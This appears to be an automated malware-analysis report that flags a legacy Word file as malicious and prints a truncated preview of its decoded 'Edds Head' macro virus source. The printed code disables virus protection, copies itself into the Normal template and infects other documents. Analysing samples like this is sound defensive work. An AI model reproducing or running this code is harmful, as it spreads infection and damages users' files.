MALICIOUS
300
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder
The sample contains legacy WordBasic and VBA macros, including AutoOpen and Auto_Close, which are indicative of malicious intent. The script attempts to establish persistence by writing to the startup folder with the path 'c:\windows\startm~1\programs\startup\msfile.bat'. The presence of legacy macro virus markers and ClamAV detections further support its malicious nature.
Heuristics 6
-
ClamAV: Win.Trojan.Pivis-2 critical CLAMAV_DETECTIONClamAV detected this file as malware: Win.Trojan.Pivis-2
-
Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUSOLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Auto_Close macro high OLE_VBA_AUTOCLOSEAuto_Close macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 27884 bytes |
SHA-256: 1b666d4031caa201b8bb5af72877b7d3ebc040341777411d13b4ac69d929a907 |
|||
|
Detection
ClamAV:
Doc.Trojan.VMPCK1-14
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "EddsHead"
Public Skip As Integer
Sub EddsHead()
'Produced by,
'The VicodinES Macro.Poppy Construction Kit v1.0b
'================================================
'Code Written by VicodinES "Live for Now"
'Poppy ID : 24421479963
On Error Resume Next
Randomize
sv = Int(Rnd * 3) + 1
If sv = 1 Then svt$ = "porno.doc"
If sv = 3 Then svt$ = "readme!.doc"
If sv = 2 Then svt$ = "sex.doc"
With Options
.ConfirmConversions = False
.VirusProtection = False
.SaveNormalPrompt = False
End With
ActiveDocument.ReadOnlyRecommended = False
rm = Int(Rnd * 100)
If rm = 99 Then MsgBox "Your Computer Has The Edds Head Virus", vbSystemModal
If Month(Now()) = 2 And Day(Now()) = 14 Then MsgBox "I Hope You Got Your Girlfriend Something Nice !", vbInformation, "Birthday Greeting!!!"
With Dialogs(wdDialogFileSummaryInfo)
.Author = "England Rules...."
.Title = "England Rules...."
.Subject = "England Rules...."
.Comments = "England Rules...."
.Keywords = "England Rules...."
.Execute
End With
z147924429 = 0
Set Unit1872442147913 = MacroContainer
f6002$ = "c:\windows\startm~1\programs\startup\msfile.bat"
d41842442 = GetAttr(NormalTemplate.FullName)
If d41842442 = vbReadOnly And System.OperatingSystem = "Windows" And System.LanguageDesignation = "English(United States)" Then Call vBitchES(f6002$)
If d41842442 = vbReadOnly + vbArchive And System.OperatingSystem = "Windows" And System.LanguageDesignation = "English(United States)" Then Call vBitchES(f6002$)
If d41842442 = vbReadOnly Then GoTo fuckoff
If d41842442 = vbReadOnly + vbArchive Then GoTo fuckoff
If Unit1872442147913 = NormalTemplate Then z147924429 = 1
If z147924429 = 1 Then OJSimpsonISaMurder14794 = NormalTemplate.FullName Else OJSimpsonISaMurder14794 = ActiveDocument.FullName
If z147924429 = 1 Then vfr244211 = ActiveDocument.FullName Else vfr244211 = NormalTemplate.FullName
Application.OrganizerCopy Source:=OJSimpsonISaMurder14794, Destination:=vfr244211, Name:="EddsHead", Object:=wdOrganizerObjectProjectItems
If z147924429 = 1 And Skip <> 1 Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName, FileFormat:=wdFormatDocument
If z147924429 = 0 Then
If NormalTemplate.Saved = False Then NormalTemplate.Save
End If
Call dhIconDisco("C:\autorun.inf")
'VMPCK v1.0b
fuckoff:
End Sub
Sub HelpAbout()
On Error Resume Next
MsgBox "Edds Head Virii", vbInformation
End Sub
Sub FileNew()
On Error Resume Next
Call EddsHead
Dialogs(wdDialogFileNew).Show
Skip = 1
Call EddsHead
End Sub
Sub FileSave()
On Error Resume Next
Call EddsHead
ActiveDocument.Save
End Sub
Sub FileClose()
On Error Resume Next
Call EddsHead
If ActiveDocument.Saved = False Then ActiveDocument.Save
ActiveDocument.Close
End Sub
Sub ToolsOptions()
On Error Resume Next
Dialogs(wdDialogToolsOptions).Show
Call EddsHead
End Sub
Sub EditFind()
On Error Resume Next
Dialogs(wdDialogEditFind).Show
Call EddsHead
End Sub
Sub FileSaveAs()
On Error Resume Next
Dialogs(wdDialogFileSaveAs).Show
Call EddsHead
End Sub
Sub FilePrint()
On Error Resume Next
Dialogs(wdDialogFilePrint).Show
Call EddsHead
End Sub
Sub FileExit()
On Error Resume Next
Call EddsHead
If ActiveDocument.Saved = False Then ActiveDocument.Save
Application.WindowState = wdWindowStateMinimize
pName = CurDir & "\"
fName = Dir(pName & "*.doc", sAttr)
If (fName <> "") And ((fName <> ".") And (fName <> "..")) Then InfectDoc = pName & fName
Documents.Open FileName:=InfectDoc, ConfirmConversions:=False, ReadOnly:= _
False, AddToRecentFiles:=False, PasswordDocument:=""
Call EddsHead
Do While (fName <> "")
fName = Dir()
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.